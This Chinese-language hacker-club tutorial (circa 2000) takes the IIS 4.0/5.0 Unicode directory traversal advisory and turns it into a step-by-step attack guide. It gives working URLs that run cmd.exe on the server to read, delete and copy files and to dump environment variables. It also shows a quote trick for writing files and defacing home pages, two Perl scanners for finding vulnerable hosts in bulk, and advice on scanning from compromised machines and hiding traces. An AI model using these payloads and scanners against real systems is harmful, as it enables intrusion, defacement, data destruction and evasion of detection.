—————————————————————————————————
badboy 坏男孩俱乐部
这并不是什么权威教材，只适合菜鸟了解win9x、NT存在的不安全面，切莫
用此方法在国内做尝试，如果你偏要如此，那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载，但须保留文章的完整性，如把本文作为经济目
的使用，或者未经本人许可进行印刷、光盘杂志、等出版性质的行为，本人
将保留侵权控告的权利。
—————————————————————————————————
2000年10月17日中联绿盟发布了以下的安全公告：
微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞
远程漏洞：是
本地漏洞：是
发布日期：2000年10月17日
更新日期：2000年10月17日
受影响的版本：
Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
不受影响的版本：
漏洞描述：
微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和"\"而能利用"../"
目录遍历的漏洞。
未经授权的用户可能利用IUSR_machinename账号的上下文空间访问任何已知
的文件。该账号在默认情况下属于Everyone 和Users组的成员，因此任何与
Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除，
修改或执行，就如同一个用户成功登陆所能完成的一样。
测试方法：(以下的程序或方法可能具有攻击性,如用于非法用途,后果自负!) http://target.computer/scripts/..%c1%1c../path/solo.txt
%c0%af = /
%c1%9c = \
解决方案:
该漏洞补丁随微软安全公告MS00-057一起发布
(http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
可以从如下地址下载补丁:
IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
—————————————————————————————————
（以上为原文）
—————————————————————————————————
该漏洞一发布后，紧接而来的是众多NT网络服务器惨遭黑手，可以说，到目
前为止，网络里仍存在此漏洞的NT服务器至少有30%，而这些站点的管理员
是白痴还是认为该漏洞不值得注意？？看来是不曾被黑不落泪，NT站的管理
员们，看完以下的方法，你快点给你的NT服务器打补丁吧。
一、UNICODE漏洞的原理
此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，
台湾繁体中文也同样存在这样的漏洞。
中文版的WIN2000中，UNICODE编码 存在BUG，在UNICODE 编码中
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
在NT4中/编码为%c1%9c
在英文版里：
WIN2000英文版%c0%af
但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，
具体情况本人未做详细的证实：
%c1%pc
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
%f0%80%80%af
%fc%80%80%80%80%af
或许是什么日文版、韩文版之类，win2000 Terminal版有兴趣的朋友可以试试。
二、UNICODE漏洞的检测
以下均以中文版WIN2K为例，如果是其他NT版本，按上面所述的编码替换以下代
码中的
%c1%1c
最简单的检测方法：
比如说有一IP地址为X.X.X.X的WIN2K主机，我们可以在地址栏输入
x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
如果存在此漏洞的话，我们便可以看到以下的内容：（例子假设SCRIPTS目录里
无文件）
Directory of C:\inetpub\scripts
2000-09-28 15 〈DIR〉 .
2000-09-28 15 〈DIR〉 ..

这是我们在很多经验交谈中常看到大家使用的方法，实际上我们也可以改为这样
127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir
即r=c 这个字母的取代，在本文发表之前，网络里没有介绍过，
关于r这字母可以等效于c,我们可以通过cmd/?可以得到解释。

当然，如果目标主机的管理员把该目录删除掉，我们就无法看到了，但是还有
以下的目录是同样可以用来测试的。 http://x.x.x.x/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
运行后，我们可以看到
Directory of c:\program files\common files\system\msadc
2000-08-06 19 <DIR> .
2000-08-06 19 <DIR> ..
（以下内容略）
19 File(s) 1,233,840 bytes
2 Dir(s) 6,290,644,992 bytes free

如果漏洞和目录同时存在的话，你就可以在WEB页上看到相对应的目录里的一
切内容。这仅是对单一目标主机的漏洞检测，如果想对某一IP段上的NT主机做
UNICODE漏洞的检测，我们就需要使用类似以下的扫描软件。
以下的源码是外国黑客写的，当然就只扫描英文版的NT，要扫描中文版的，需要
做相应的修改。
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c
#perhaps a public script to do some evil stuff with this exploit later... h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=<STDIN> );
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while (<IN> )
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}

sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}


——————————————————————————————————
以上的pl程序你可以在本机运行（当然需要安装PERL），也可以在远程的
服务器上运行。

三、UNICODE编码漏洞简单利用的命令
一般情况下我们用 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
看到的目录是空的：（例如）
Directory of C:\inetpub\scripts
2000-09-28 15 〈DIR〉 .
2000-09-28 15 〈DIR〉 ..
如果我们这样输入的话： http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
就可以看到该主机c:盘的目录和文件了。
其他的一些简单的用法：
1、显示文件内容
如果想显示里面的其中一个badboy.txt文本文件，我们可以这样输入
（htm,html，asp,bat等文件都是一样的） http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:\badboy.txt
那么该文件的内容就可以通过IE显示出来。
2、建立文件夹的命令 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:\badboy
运行后我们可以看到返回这样的结果：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
英文意思是
CGI错误
具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为：

3、删除空的文件夹命令： http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:\badboy
返回信息同上

4、删除文件的命令: http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\badboy.txt
返回信息同上

5、copy文件且改名的命令： http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\badboy.txt bad.txt
返回信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
1 file(s) copied.

6、显示目标主机当前的环境变量 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set
返回的信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=E:\Documents and Settings\All Users
AUTH_TYPE=Negotiate
AUTH_USER=BADBOYCL-DQQZQQ\badboy
CASL_BASEDIR_ENV=E:\scan\CyberCop Scanner\casl
CommonProgramFiles=E:\Program Files\Common Files
COMPUTERNAME=BADBOYCL-DQQZQQ
ComSpec=E:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=127.0.0.1
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_AUTHORIZATION=Negotiate TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADAAMAF4AAAAeAB4AagAAAAAA
AAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAYQBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAF
oAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vzSAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_I

7、把某个文件夹内的全部文件一次性COPY到另外的文件夹去 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopy c:\badboy c:\inetpub\wwwroot
返回的信息：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
我们查看c:\inetpub\wwwroot文件夹，结果所有c:\badboy内的都拷贝到该目录里了

8、把某个文件夹剪贴到指定的目录去 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+move c:\badboy c:\inetpub\wwwroot
呵呵，还是可以做到的，时间的长短要看文件的多少了

9、显示某一路径下相同文件类型的文件内容 http://127.0.0.1/scripts/..%c1%1c..\winnt/system32/find.exe?/n+/v+""+c:\inetpub\wwwroot\*.ht*
完全显示出来呀

同样，还有很多命令可以执行，大家可以试试，不过有些时间会很久，有些
是不能执行的。

解释+号，在这里+等于空格键，当然你也可以用空格键，用空格键运行后会
转换为%20 和%c1%1c=/是同一道理的。

对于名字超过8个字母的文件夹，如果我们想看里面的内容时就有点不同了
比如说我们想看目标主机Program Files文件夹里面的内容时，应该这样输入 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\progra~1
这里就不能用+或者%20来代替program与files间的空格。
至于对aa bb这样中间带有空格的文件夹怎么看，目前我还不知道，如果谁知道
可以写出来。
在攻略2里我提到
至于对aa bb这样中间带有空格的文件夹怎么看，目前我还不知道，如果谁知道
可以写出来。
通过对dos的8.3规则的补习，终于弄明白怎么看aa bb文件夹了方法就是以下 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:\aabb~1
aa bb=aabb~1
如果同目录下还有aab b文件夹，就用这样的代码看aab b文件夹里的内容 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:\aabb~2
依此类推。
四、如何简单地修改目标主机的web页面
一般情况下，我们要修改目标主机的web文件，常用到的方法是利用echo回显、管道
工具> >>。
先复习一下这些命令和管道工具的功能。
D:\>echo/?
显示信息，或将命令响应打开或关上。
ECHO [ON | OFF]
ECHO [message]
仅键入 ECHO 而不加参数，可以显示当前的 ECHO 设置。

管道工具> >>的功能
"> >>" 是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中.
>>产生的内容将追加进文件中,>则将原文件内容覆盖。

再看看cmd/?里面的部分内容：
请注意，如果字符串有引号，可以接受用命令分隔符 '&&' 隔开
的多个命令。并且，由于兼容原因，/X 与 /EN 相同，/Y 与
/EFF 相同，并且 /R 与 /C 相同。忽略任何其它命令选项。
如果指定了 /C 或 /K，命令选项后的命令行其余部分将作为命令行处
理；在这种情况下，会使用下列逻辑处理引号字符("):
1. 如果符合下列所有条件，那么在命令行上的引号字符将被
保留:
- 不带 /S 命令选项
- 整整两个引号字符
- 在两个引号字符之间没有特殊字符，特殊字符为下列中的
一个: <>()@^|
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文件的名称。
2. 否则，老办法是，看第一个字符是否是一个引号字符，如果
是，舍去开头的字符并删除命令行上 的最后一个引号字符，
保留最后一个引号字符之后的文字。

————————————————————
从以上可以得到什么启示？
我们知道IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符
“&|(,;%<>”，如果发现有这些字符就会返回500错误，所以不能直接使用
CMD.EEX加管道符等。
通过 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+badboy+> c:\badboy.txt
我们可以看到提示
HTTP 500 - 内部服务器错误
Internet Explorer
经过反复测试，并从上面cmd内容的提示，我们可以会发现"引号字符是可以利
用的，中联绿盟的yuange(袁哥)发布过关于这字符的公告，我想也许也是从上面
的cmd/?信息中得到提示的，(纯属个人猜想，如果不是，请yuange不要见怪）。

我们要得到echo与>的结合使用，可以这样操作。 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+badboy+> c:\badboy.txt
注意，与开始的命令的区别只在于cmd后面多了个"字符。
运行后我们可以看到返回这样的结果：
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
英文意思是
CGI错误
具体的CGI申请有误，不能返回完整的HTTP标题，返回的标题为：

实际上，我们已经把badboy写入到c:\badboy.txt文件里了。

利用这样的方法我们可以建立.bat .txt .asp .htm .html 等文件，这对于一个存在这
漏洞的网站可以说是致命打击的开始，尤其是能写.bat文件
如果我们在autoexe.bat里面加入format del等命令时，你想结果会如何？？

回到修改网站页面的问题来。
比如说想修改c:\inetpub\wwwroot\default.asp
我们就可以这样在地址栏输入： http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+your+site+has+unicode+bug+> c:\inetpub\wwwroot\default.asp
那么再看他的首页时，已经被修改为
your site has unicode bug

事情就那么简单，任何一个普通人都可以通过地址栏对存在该漏洞的目标主机做最简单的
HACK行为。
当然，如果为了方便输入，我们可以把cmd.exe改名为其他名字的文件，比如说c.exe http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\c.exe
以后使用就可以直接 http://x.x.x.x/scripts/c.exe?/c+echo+badboy+> c:\badboy.txt
五、网络里可得到的一些UNICODE扫描程序的分析
1、简单易用的red.exe
操作平台：win9x、NT4、WIN2K
该软件可以在一些中文黑客软件收藏库里找到下载。
red.exe是中国大陆的一位HACK技术爱好者Redp0wer用C++编写的针对某一IP段的
NT主机UNICODE编码漏洞的命令行式扫描工具，该工具扫描速度快，扫描准确。
可以在本地和远程NT肉机上执行扫描工作，并产生一个简单的扫描报告RED.txt
（仅记录所扫描的IP段的NT主机的IP地址）。
该软件对目标NT主机scripts、IISADMPWD、msadc、cgi-bin、_vti_bin目录都做
UNICODE编码漏洞的测试。
如果你仅能在本地机上对某个IP段进行扫描，且是固定IP地址的用户，在使用该
软件时，你须注意你的扫描行为实际上也把你自己暴露给对方。且容易被对方抓
住把柄状告你有入侵行为。我们可以从事件查看器里发现执行的足迹
应用程序日志c:\WINNT\system32\config\AppEvent.Evt
安全日志C:\WINNT\System32\config\SecEvent.Evt
系统日志C:\WINNT\system32\config\SysEvent.Evt

我们分析该软件的源码可以看到：
GET /%s/%s/winnt/system32/cmd.exe?/c%scopy%s%s:\\winnt\\system32\\cmd.exe%s%s\\red.exe HTTP/1.0\n\n
如果从安全扫描工具来说，是不应该对所扫描的目标主机做任何文件的增加和修改。
所以，在你还不知道怎么消除你的足迹和利用肉机来执行扫描时，最好不要利用这
软件作为你的扫描工具。

2、比较全面的UNICODE工具Uni2.pl
只要支持PERL，就可以利用这工具来对目标主机进行UNICODE编码漏洞的扫描。
该程序可以对所有存在UNICODE编码漏洞的NT版本进行扫描测试。以下为该软件
的源程序，具体如何操作就不做详细解说了。
#!/usr/bin/perl
#
# Uni2.pl checks a host for the recent IIS unicode vulnerability
# in 14 different ways. Also gives you the browser URL for the
# exploit. Origionally Stealthmode316, modifications by Roeland
#
#
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-CHECK

Example: ./uni.pl www.target.com:80\n";}

#($host,$port)=split(/:/,@ARGV[0]);
($host = @ARGV[0]);
$port = 80;

$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 2
my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 3
my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 4
my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 5
my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 6
my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 7
my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 8
my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 9
my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 10
my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 11
my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 12
my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 13
my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir\n";}}

# ---------------test method 14
my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n
");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir\n";}}

if ($flag!=1) {
print "$host: Not vulnerable\n";
exit;
}

sub sendraw {

$hbn = gethostbyname($host);

if ($hbn) {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,gethostbyname('tcp')||0) || die("Socket problems\n");

if(connect(S,pack "SnA4x8",2,$port,$target)) {
my @in;
select(S);
$|=1;
print $pstr;

while(<S> ){
push @in, $_;
}

select(STDOUT);
close(S);
return @in;
} else {
print "$host: Can't connect\n";
exit;
}
} else {
print "$host: Host not found\n";
exit;
}
}

最主要的访问LOG在C:\WINNT\SYSTEM32\LogFiles\W3SVC1
里面记录着每次的访问记录

主目录 分目录